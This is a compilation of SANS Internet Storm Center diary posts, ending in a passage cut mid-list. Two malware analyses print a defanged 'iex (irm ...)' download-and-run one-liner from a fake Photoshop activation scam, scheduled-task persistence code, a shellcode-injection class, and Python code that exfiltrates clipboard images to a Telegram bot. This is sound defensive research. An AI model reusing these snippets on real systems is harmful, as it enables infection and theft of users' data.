Attackers are everywhere! They try to abuse victims using new communication channels and social engineering techniques! Somebody pointed my to the following Tik-Tok video: hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/.

The author pretends to provide you an easy way to activate Photoshop for free:

Note that the video has already been liked more than 500 times!

The technique is similar to the ClickFix[1] attack scenario. The victim is asked to start a PowerShell as administrator and execute a one-liner:

iex (irm slmgr[.]win/photoshop)

When visiting this linlk, you'll get a piece of malicious PowerShell code that will be executed (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23). It has a VT score of 17/63[2]. Let’s have a look at it!

It downloads the next stage from https://file-epq[.]pages[.]dev/updater.exe. Persistence is implemented through a scheduled task to execute it at logon time:

$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -Command `"$scr`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null

Updater.exe (SHA256:58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) is an AuroStealer[3].

Finally, a second payload is downloaded and executed: source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)[4]. This one implements an interesting technique, it compiles some code on demand during its execution:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"

This is something that I covered in previous diaries ("self-compiling malware")[5]. The compile code is a class used to inject a shellcode in memory:

using System;
using System.Runtime.InteropServices; 
public class SC { 
    [DllImport("kernel32.dll")] 
    public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p); 
    [DllImport("kernel32.dll")] 
    public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t); 
    [DllImport("kernel32.dll")] 
    public static extern uint WaitForSingleObject(IntPtr h, uint m); 
    public static void Run(byte[] sc) { 
      IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40); 
      Marshal.Copy(sc, 0, addr, sc.Length); 
      IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 
      WaitForSingleObject(t, 0xFFFFFFFF); 
    } 
}

While invetigating this piece of malware, I discovered more videos from the same campaing but using other software names:

• hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/
• hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/

Stay safe and don't trust such videos!

[1] https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
[2] https://www.virustotal.com/gui/file/6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer
[4] https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
[5] https://isc.sans.edu/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This week, we set up a new Slack workspace for DShield.org. This workspace replaces the old workspace we originally configured back in 2016 or 2017. The workspace was originally configured as a free workspace to support the DShield.org community. Over the years, it has had a good following and a good amount of traffic.

Sadly, we learned that none of the "S" in SaaS stands for security or privacy. A couple of years ago, the SANS Institute decided to purchase an enterprise license for its Slack workspace. The details have been lost to time and to a complete turnover of contacts at Slack and now Salesforce. But our DShield.org workspace ended up as part of the Enterprise account, leading to an inflated subscription fee for SANS. As "Owner" of the DShield.org Slack, I was never asked to have the DShield.org Slack merged with the SANS account. As far as I can tell, nobody from SANS asked for it. This was not the only Slack affected. Several smaller Slack workspaces created by SANS instructors for their personal use were merged as well.

Salesforce, the current owner of the Slack brand, offered two options: Keep paying for the Slack workspace (several $ per month per user) or create a new workspace. They repeatedly denied that there is any other option. SANS did consult with me about how to move forward, and I did interact with several contacts at Salesforce to attempt to verify what exactly happened. But none of the Salesforce contacts were familiar with what exactly happened in part due to high turnover. I got various conflicting answers, but they remained consistent in being unable to "undo" the switch that turned the DShield.org workspace into an enterprise account.

SANS did offer to pay the inflated fee, but I do not think it is right to just roll over and pay. Instead, I started a new Slack this week. You can find it here:

https://join.slack.com/t/dshieldorgsup-kp41959/shared_invite/zt-3fmshiz9v-KwX2Vmgc3jdkrMDl8sWTNQ

Why did we not just move to another solution? There are various free community communication solutions. We have used several over the last 25 years: IRC and Jabber come to mind. Currently, Discord is a strong contender. Others suggested Telegram, Mattermost, Signal, WhatsApp, and Matrix. I did a quick poll on the old Slack, and Slack won as an option. I know, there is some bias here among existing Slack users. But one goal is not to lose existing community members. Personally, I also try to limit the number of chat clients I am running. Maybe we should go back to IRC or Silk :) 

So for now, we will stick with Slack, cross our fingers, and hope things work out with the new workspace. Existing members of the old Slack should have received an email with the new invite link. I will also do a mass invite in the new Slack later today for existing "old workspace members".

The old workspace will be deleted this Monday.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

For a while, clipboard content has been monitored by many infostealers. Purposes can be multiple, like simply searching and exfiltrating juicy data or on-the-fly modification like crypto-wallet swapping[1]. Note that the clipboard is a major risk when you don't disable clipboard sharing between your virtual machines and hosts. A malware running in a sandbox will access your (host) clipboard without problem!

The clipboard does not only carry text. Today, we use the clipboard to manipulate a lot of "binary data". After plain text, the most common data types are pictures! We take pictures every time and share them through the clipboard! Who has never grabbed pieces of screens like this? This is convenient when writing reports, documentation, or for archiving purposes.

I spotted a Python infostealer that pays attention to pictures exchanged with the clipboard. It's pretty easy to implement because the ImageGrab library has this feature built in [2]. Here is the piece of code implemented in the malware:

img = ImageGrab.grabclipboard()
if isinstance(img, Image.Image):
    img_bytes = io.BytesIO()
    img.save(img_bytes, format='PNG')
    img_hash = hashlib.md5(img_bytes.getvalue()).hexdigest()
    if img_hash != prev_clip_img_hash:
        img_path = "clipboard_img.png"
        img.save(img_path, "PNG")
        send_image(img_path)
        prev_clip_img_hash = img_hash

Telegram is used for C2 communications:

def send_image(image_path):
    if not bot_active or not os.path.exists(image_path):
        logging.warning(f"[send_image] T?p không t?n t?i: {image_path}")
        return
    try:
        with open(image_path, "rb") as photo:
            url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
            files = {"document": photo}
            data = {"chat_id": CHAT_ID}
            response = requests.post(url, files=files, data=data)
            if response.status_code != 200:
                logging.error(f"[send_image] L?i g?i ?nh: {response.text}")
    except Exception as e:
        logging.error(f"[send_image] G?i ?nh l?i: {e}")

Note the presence of Vietnamese text ("T?p không t?n t?i" means "File not found"). The file (SHA256:7c70f53ff1e05ee104403784f42819adb1e445c9d97b82cff72a986d59619959) has a low VT score (5/64)[3].

[1] https://isc.sans.edu/diary/MultiCryptocurrency+Clipboard+Swapper/28574
[2] https://pillow.readthedocs.io/en/stable/reference/ImageGrab.html#PIL.ImageGrab.grabclipboard
[3] https://www.virustotal.com/gui/file/7c70f53ff1e05ee104403784f42819adb1e445c9d97b82cff72a986d59619959/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I am experimenting today with a little bit of a cleaned-up patch overview. I removed vulnerabilities that affect Microsoft's cloud systems (but appreciate Microsoft listing them at all), as well as vulnerabilities in third-party software like open source libraries. This should leave us with Microsoft-specific on-premises vulnerabilities. This month, this leaves 157 different vulnerabilities. Eight of the vulnerabilities are rated critical.

This month, Microsoft is discontinuing support for a number of different products:

• Windows 10
• Office 2016
• Exchange Server 2016
• Office 2019
• Exchange Server 2019

Office and Exchange users are directed towards cloud and subscription offerings. For Office, you still have Office 2024 available if you would rather "own" the product. For Exchange, the Exchange Server Subscription Edition is available as of July.

Windows 10 users will have the option to sign up for "Extended Security Updates" (ESU). It has been offered as a low-cost alternative to retain security updates, and in some countries, it is offered for free.

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
.NET Elevation of Privilege Vulnerability
%%cve:2025-55247%%	No	No	-	-	Important	7.3	6.4
.NET, .NET Framework, and Visual Studio Information Disclosure Vulnerability
%%cve:2025-55248%%	No	No	-	-	Important	4.8	4.2
ASP.NET Security Feature Bypass Vulnerability
%%cve:2025-55315%%	No	No	-	-	Important	9.9	8.6
Configuration Manager Elevation of Privilege Vulnerability
%%cve:2025-55320%%	No	No	-	-	Important	6.7	5.8
%%cve:2025-59213%%	No	No	-	-	Important	8.4	7.3
Copilot Spoofing Vulnerability
%%cve:2025-59272%%	No	No	-	-	Critical	6.5	5.7
%%cve:2025-59286%%	No	No	-	-	Critical	6.5	5.7
Data Sharing Service Spoofing Vulnerability
%%cve:2025-59200%%	No	No	-	-	Important	7.7	6.7
Desktop Windows Manager Elevation of Privilege Vulnerability
%%cve:2025-55681%%	No	No	-	-	Important	7.0	6.1
DirectX Graphics Kernel Denial of Service Vulnerability
%%cve:2025-55698%%	No	No	-	-	Important	7.7	6.7
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-55678%%	No	No	-	-	Important	7.0	6.1
Internet Information Services (IIS) Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability
%%cve:2025-59282%%	No	No	-	-	Important	7.0	6.1
JDBC Driver for SQL Server Spoofing Vulnerability
%%cve:2025-59250%%	No	No	-	-	Important	8.1	7.1
M365 Copilot Spoofing Vulnerability
%%cve:2025-59252%%	No	No	-	-	Critical	6.5	5.7
MITRE CVE-2025-54957: Integer overflow in Dolby Digital Plus audio decoder
%%cve:2025-54957%%	No	No	-	-	Important	7.0	6.1
MITRE: CVE-2025-59489 Unity Gaming Engine Editor vulnerability
%%cve:2025-59489%%	No	No	-	-	Important	8.4	8.4
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2025-48004%%	No	No	-	-	Important	7.4	6.4
%%cve:2025-59189%%	No	No	-	-	Important	7.4	6.4
Microsoft DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-58722%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59254%%	No	No	-	-	Important	7.8	6.8
Microsoft Defender for Linux Denial of Service Vulnerability
%%cve:2025-59497%%	No	No	-	-	Important	7.0	6.1
Microsoft Excel Information Disclosure Vulnerability
%%cve:2025-59235%%	No	No	-	-	Important	7.1	6.2
%%cve:2025-59232%%	No	No	-	-	Important	7.1	6.2
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-59231%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59233%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59236%%	No	No	-	-	Critical	8.4	7.3
%%cve:2025-59243%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59223%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59224%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59225%%	No	No	-	-	Important	7.8	6.8
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2025-53782%%	No	No	-	-	Important	8.4	7.3
%%cve:2025-59249%%	No	No	-	-	Important	8.8	7.7
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2025-59248%%	No	No	-	-	Important	7.5	6.5
Microsoft Failover Cluster Information Disclosure Vulnerability
%%cve:2025-47979%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-59188%%	No	No	-	-	Important	5.5	4.8
Microsoft Failover Cluster Virtual Driver Information Disclosure Vulnerability
%%cve:2025-59260%%	No	No	-	-	Important	5.5	4.8
Microsoft Graphics Component Denial of Service Vulnerability
%%cve:2025-59195%%	No	No	-	-	Important	7.0	6.1
Microsoft Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-49708%%	No	No	-	-	Critical	9.9	8.6
Microsoft Office Denial of Service Vulnerability
%%cve:2025-59229%%	No	No	-	-	Important	5.5	4.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-59234%%	No	No	-	-	Critical	7.8	6.8
%%cve:2025-59227%%	No	No	-	-	Critical	7.8	6.8
Microsoft Office Visio Remote Code Execution Vulnerability
%%cve:2025-59226%%	No	No	-	-	Important	7.8	6.8
Microsoft PowerPoint Remote Code Execution Vulnerability
%%cve:2025-59238%%	No	No	-	-	Important	7.8	6.8
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2025-59228%%	No	No	-	-	Important	8.8	7.7
%%cve:2025-59237%%	No	No	-	-	Important	8.8	7.7
Microsoft Windows File Explorer Spoofing Vulnerability
%%cve:2025-58739%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-59214%%	No	No	-	-	Important	6.5	5.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2025-59221%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-59222%%	No	No	-	-	Important	7.8	6.8
NTLM Hash Disclosure Spoofing Vulnerability
%%cve:2025-59185%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-59244%%	No	No	-	-	Important	6.5	5.7
Network Connection Status Indicator (NCSI) Elevation of Privilege Vulnerability
%%cve:2025-59201%%	No	No	-	-	Important	7.8	6.8
NtQueryInformation Token function (ntifs.h) Elevation of Privilege Vulnerability
%%cve:2025-55696%%	No	No	-	-	Important	7.8	6.8
Playwright Spoofing Vulnerability
%%cve:2025-59288%%	No	No	-	-	Moderate	5.3	4.9
PowerShell Elevation of Privilege Vulnerability
%%cve:2025-25004%%	No	No	-	-	Important	7.3	6.4
Remote Desktop Client Remote Code Execution Vulnerability
%%cve:2025-58718%%	No	No	-	-	Important	8.8	7.7
Remote Desktop Protocol Remote Code Execution Vulnerability
%%cve:2025-58737%%	No	No	-	-	Important	7.0	6.1
Remote Procedure Call Denial of Service Vulnerability
%%cve:2025-59502%%	No	No	-	-	Moderate	7.5	6.5
Software Protection Platform (SPP) Elevation of Privilege Vulnerability
%%cve:2025-59199%%	No	No	-	-	Important	7.8	6.8
Storage Spaces Direct Information Disclosure Vulnerability
%%cve:2025-59184%%	No	No	-	-	Important	5.5	4.8
Storport.sys Driver Elevation of Privilege Vulnerability
%%cve:2025-59192%%	No	No	-	-	Important	7.8	6.8
Virtual Secure Mode Spoofing Vulnerability
%%cve:2025-48813%%	No	No	-	-	Important	6.3	5.5
Visual Studio Elevation of Privilege Vulnerability
%%cve:2025-55240%%	No	No	-	-	Important	7.3	6.4
Windows Active Directory Federation Services (ADFS) Information Disclosure Vulnerability
%%cve:2025-59258%%	No	No	-	-	Important	6.2	5.4
Windows Agere Modem Driver Elevation of Privilege Vulnerability
%%cve:2025-24990%%	No	Yes	-	-	Important	7.8	7.2
%%cve:2025-24052%%	Yes	No	-	-	Important	7.8	7.0
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2025-59242%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-58714%%	No	No	-	-	Important	7.8	6.8
Windows Authentication Elevation of Privilege Vulnerability
%%cve:2025-55701%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59277%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59275%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59278%%	No	No	-	-	Important	7.8	6.8
Windows BitLocker Security Feature Bypass Vulnerability
%%cve:2025-55333%%	No	No	-	-	Important	6.1	5.3
%%cve:2025-55338%%	No	No	-	-	Important	6.1	5.3
%%cve:2025-55330%%	No	No	-	-	Important	6.1	5.3
%%cve:2025-55332%%	No	No	-	-	Important	6.1	5.3
%%cve:2025-55337%%	No	No	-	-	Important	6.1	5.3
%%cve:2025-55682%%	No	No	-	-	Important	6.1	5.3
Windows Bluetooth Service Elevation of Privilege Vulnerability
%%cve:2025-58728%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59290%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59289%%	No	No	-	-	Important	7.0	6.1
Windows COM+ Event System Service Elevation of Privilege Vulnerability
%%cve:2025-58725%%	No	No	-	-	Important	7.0	6.1
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2025-55680%%	No	No	-	-	Important	7.8	6.8
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
%%cve:2025-55336%%	No	No	-	-	Important	5.5	4.8
Windows Connected Devices Platform Service (Cdpsvc) Remote Code Execution Vulnerability
%%cve:2025-55326%%	No	No	-	-	Important	7.5	6.5
Windows Connected Devices Platform Service Elevation of Privilege Vulnerability
%%cve:2025-58719%%	No	No	-	-	Important	4.7	4.1
%%cve:2025-58727%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-59191%%	No	No	-	-	Important	7.8	6.8
Windows Cryptographic Services Information Disclosure Vulnerability
%%cve:2025-58720%%	No	No	-	-	Important	7.8	6.8
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-59255%%	No	No	-	-	Important	7.8	6.8
Windows Device Association Broker Service Elevation of Privilege Vulnerability
%%cve:2025-50174%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55677%%	No	No	-	-	Important	7.8	6.8
Windows Digital Media Elevation of Privilege Vulnerability
%%cve:2025-53150%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-50175%%	No	No	-	-	Important	7.8	6.8
Windows ETL Channel Information Disclosure Vulnerability
%%cve:2025-59197%%	No	No	-	-	Important	5.5	4.8
Windows Error Reporting Service Elevation of Privilege Vulnerability
%%cve:2025-55692%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-55694%%	No	No	-	-	Important	7.8	6.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-59205%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-59261%%	No	No	-	-	Important	7.0	6.1
Windows Health and Optimized Experiences Elevation of Privilege Vulnerability
%%cve:2025-59241%%	No	No	-	-	Important	7.8	6.8
Windows Hello Security Feature Bypass Vulnerability
%%cve:2025-53139%%	No	No	-	-	Important	7.7	6.7
Windows Hyper-V Elevation of Privilege Vulnerability
%%cve:2025-55328%%	No	No	-	-	Important	7.8	6.8
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2025-59207%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-50152%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-55693%%	No	No	-	-	Important	7.4	6.4
%%cve:2025-59187%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59194%%	No	No	-	-	Important	7.0	6.1
Windows Kernel Information Disclosure Vulnerability
%%cve:2025-59186%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-55679%%	No	No	-	-	Important	5.1	4.5
%%cve:2025-55683%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-55699%%	No	No	-	-	Important	5.5	4.8
Windows Kernel Security Feature Bypass Vulnerability
%%cve:2025-55334%%	No	No	-	-	Important	6.2	5.4
Windows Local Session Manager (LSM) Denial of Service Vulnerability
%%cve:2025-59257%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-59259%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-58729%%	No	No	-	-	Important	6.5	5.7
Windows Management Services Elevation of Privilege Vulnerability
%%cve:2025-59193%%	No	No	-	-	Important	7.0	6.1
Windows Management Services Information Disclosure Vulnerability
%%cve:2025-59204%%	No	No	-	-	Important	5.5	4.8
Windows MapUrlToZone Information Disclosure Vulnerability
%%cve:2025-59208%%	No	No	-	-	Important	7.1	6.2
Windows NTFS Elevation of Privilege Vulnerability
%%cve:2025-55335%%	No	No	-	-	Important	7.4	6.4
Windows NTLM Spoofing Vulnerability
%%cve:2025-59284%%	No	No	-	-	Important	3.3	2.9
Windows Network Driver Interface Specification Driver Elevation of Privilege Vulnerability
%%cve:2025-55339%%	No	No	-	-	Important	7.8	6.8
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability
%%cve:2025-55685%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55686%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55689%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55331%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55684%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55688%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55690%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-55691%%	No	No	-	-	Important	7.0	6.1
Windows Push Notification Information Disclosure Vulnerability
%%cve:2025-59211%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-59209%%	No	No	-	-	Important	5.5	4.8
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
%%cve:2025-59230%%	No	Yes	-	-	Important	7.8	7.2
Windows Remote Desktop Protocol Security Feature Bypass
%%cve:2025-55340%%	No	No	-	-	Important	7.0	6.1
Windows Remote Desktop Services Elevation of Privilege Vulnerability
%%cve:2025-59202%%	No	No	-	-	Important	7.0	6.1
Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability
%%cve:2025-59206%%	No	No	-	-	Important	7.4	6.4
%%cve:2025-59210%%	No	No	-	-	Important	7.4	6.4
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
%%cve:2025-55687%%	No	No	-	-	Important	7.4	6.4
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-55700%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-58717%%	No	No	-	-	Important	6.5	5.7
Windows SMB Client Tampering Vulnerability
%%cve:2025-59280%%	No	No	-	-	Important	3.1	2.7
Windows SMB Server Elevation of Privilege Vulnerability
%%cve:2025-58726%%	No	No	-	-	Important	7.5	6.5
Windows Search Service Denial of Service Vulnerability
%%cve:2025-59190%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-59198%%	No	No	-	-	Important	5.0	4.4
%%cve:2025-59253%%	No	No	-	-	Important	5.5	4.8
Windows Server Update Service (WSUS) Remote Code Execution Vulnerability
%%cve:2025-59287%%	No	No	-	-	Critical	9.8	8.5
Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability
%%cve:2025-59196%%	No	No	-	-	Important	7.0	6.1
Windows Speech Runtime Elevation of Privilege Vulnerability
%%cve:2025-58715%%	No	No	-	-	Important	8.8	7.7
%%cve:2025-58716%%	No	No	-	-	Important	8.8	7.7
Windows State Repository API Server File Information Disclosure Vulnerability
%%cve:2025-59203%%	No	No	-	-	Important	5.5	4.8
Windows Storage Management Provider Information Disclosure Vulnerability
%%cve:2025-55325%%	No	No	-	-	Important	5.5	4.8
Windows Taskbar Live Preview Information Disclosure Vulnerability
%%cve:2025-59294%%	No	No	-	-	Important	2.1	1.9
Windows URL Parsing Remote Code Execution Vulnerability
%%cve:2025-59295%%	No	No	-	-	Important	8.8	7.7
Windows USB Video Class System Driver Information Disclosure Vulnerability
%%cve:2025-55676%%	No	No	-	-	Important	5.5	4.8
Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability
%%cve:2025-53717%%	No	No	-	-	Important	7.0	6.1
Windows WLAN AutoConfig Service Information Disclosure Vulnerability
%%cve:2025-55695%%	No	No	-	-	Important	5.5	4.8
Xbox Gaming Services Elevation of Privilege Vulnerability
%%cve:2025-59281%%	No	No	-	-	Important	7.8	6.8
Xbox IStorageService Elevation of Privilege Vulnerability
%%cve:2025-53768%%	No	No	-	-	Important	7.8	6.8

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In January, a possible XSS vulnerability was found in the electronic document security management system ESAFENET CDG. This was the latest (as far as I can tell) in a long list of vulnerabilities in the product. Prior vulnerabilities included SQL injection issues and weaknesses in the encryption used to safeguard documents. In other words: A typical "secure" document management system. The product appears to be targeting the Chinese market, and with a website all in Chinese, I doubt it is used much, if at all, outside China.

The scans we are seeing are directed at "/CDGServer3/SystemConfig". The one vulnerability I was able to find was CVE-2025-0785, which mentions a possible XSS vulnerability in SystemConfig.jsp. Sadly, not all of our sensors report POST data (working on fixing that), so I am not sure if this is the issue they are trying to exploit. The GitHub repo with details about the vulnerability is no longer available, and the NVD entries are not really complete and do not link to any pages within the manufacturer's website with possible patches.

A quick scan of the manufacturer's website did not reveal any obvious patches or references to this bug.

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-0785
[2] https://www.esafenet.com

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark release 4.4.10 fixes 6 bugs and 1 vulnerability (in the MONGO dissector).

A new branch with many new features is released too: 4.6.0

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Jin Quan Low, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

Ransomware [2] is often the first word that comes to mind when we think about cybercriminals chasing financial gain. It barges in, locks files, drops ransom notes, and causes immediate disruption.

Cryptojacking [3], on the other hand, acts like a quiet trespasser. It slips in unnoticed, makes itself at home, and hijacks computing resources in the background to mine cryptocurrency while the victim stays unaware. Because it rarely causes disruptions, cryptojacking does not get the same level of attention as ransomware. 

Over the past three months, my DShield honeypot captured repeated attempts to deploy RedTail, a cryptojacking malware first observed in early 2024 [4]. RedTail targets Monero cryptocurrency [5], typically gaining access through brute-forced SSH logins or exploiting vulnerabilities and deploying scripts to establish persistence and launch mining processes. The activity observed showed that compromises can extend beyond simple cryptomining, making RedTail a relevant case study for defenders.

Mapping Attacks to MITRE ATT&CK Tactics, Techniques and Procedures (TTPs)

Malware IOCs are very useful for quick detection, but they can be easily invalidated. Attackers only need to change part of their code, and those indicators lose all value. RedTail malware is no exception. Researchers had already detected different hashes of the same malware [6]. 

TTPs on the other hand rarely change and can be leveraged to detect similar threat behaviours. Hence, the observed attack involving RedTail malware will be mapped to the MITRE ATT&CK framework and how we can better defend ourselves. 

ATT&CK framework can be categorized into PRE-ATT&CK and ATT&CK (Refer to Figure 1).

Figure 1: PRE-ATT&CK & ATT&CK (MITRE ATT&CK framework)

 

The following attack sequence observed from my honeypot is mapped to this framework as an example.

PRE-ATT&CK

The early phases — reconnaissance and weaponization — may not always appear in logs, but later activity on the honeypot shows the existence of those phases (refer to Figure 2).

• Reconnaissance: Attackers scan IP ranges to look for exposed services (T1595.001: Active Scanning – Scanning IP Block).
• Weaponization: They develop or package their malware payloads (T1587.001: Develop Capabilities – Malware) and stage them for delivery (T1608.001: Stage Capabilities – Upload Malware).

Figure 2: PRE-ATT&CK phase showing reconnaissance and weaponization techniques observed

 

ATT&CK

ATT&CK phase entails the Deliver, Exploit, Control, Execute and Maintain stages.

The Deliver phase (refer to Figure 3) is mapped to the following stages:

• Initial Access: In my honeypot, attackers attempted brute-force SSH logins and eventually succeeded using valid credentials (T1078.002: Valid Accounts – Local Account).
• Execution: Once inside, attackers ran clean.sh and setup.sh to prepare the environment (T1059.004: Command and Scripting Interpreter – Unix Shell).
• Persistence: Attackers implanted their own SSH keys to maintain access (T1098.004: Account Manipulation – SSH Authorized Keys). This allowed them to return at will, bypassing password controls.

Figure 3: Deliver phase highlighting brute-forced SSH access, script execution, and persistence methods)

 

The Exploit to Execute phase (refer to Figure 4) is mapped to the following stages:

• Defense Evasion: Attackers deleted files to cover their tracks (T1070.004: Indicator Removal – File Deletion). 
• Discovery: Attackers queried system information to confirm compatibility before deploying RedTail (T1082: System Information Discovery).

Figure 4: Exploit and Execute phase showing file deletion and system discovery activity

 

The Execute and Maintain phase (refer to Figure 5) is mapped to the following stages:

• Command and Control: Outbound HTTPS traffic (Port 443) from infected systems to malicious mining pool servers [6]. This matches ATT&CK’s T1071.001: Application Layer Protocol – Web Protocols.
• Impact: RedTail malware is known to hijack CPU cycles to mine cryptocurrency (T1496.001: Resource Hijacking – Compute Hijacking). While subtle, this creates financial and performance costs for victims.

Figure 5: Execute and Maintain stage including outbound pool traffic and cryptojacking impact

 

Unique Observations from Honeypot

While RedTail has been reported in multiple incidents, my honeypot logs revealed several noteworthy behaviors beyond generic cryptojacking activity:

• Brute-forced SSH access: Attackers brute-forced SSH logins before deploying RedTail, showing that weak credentials remain an active entry vector.
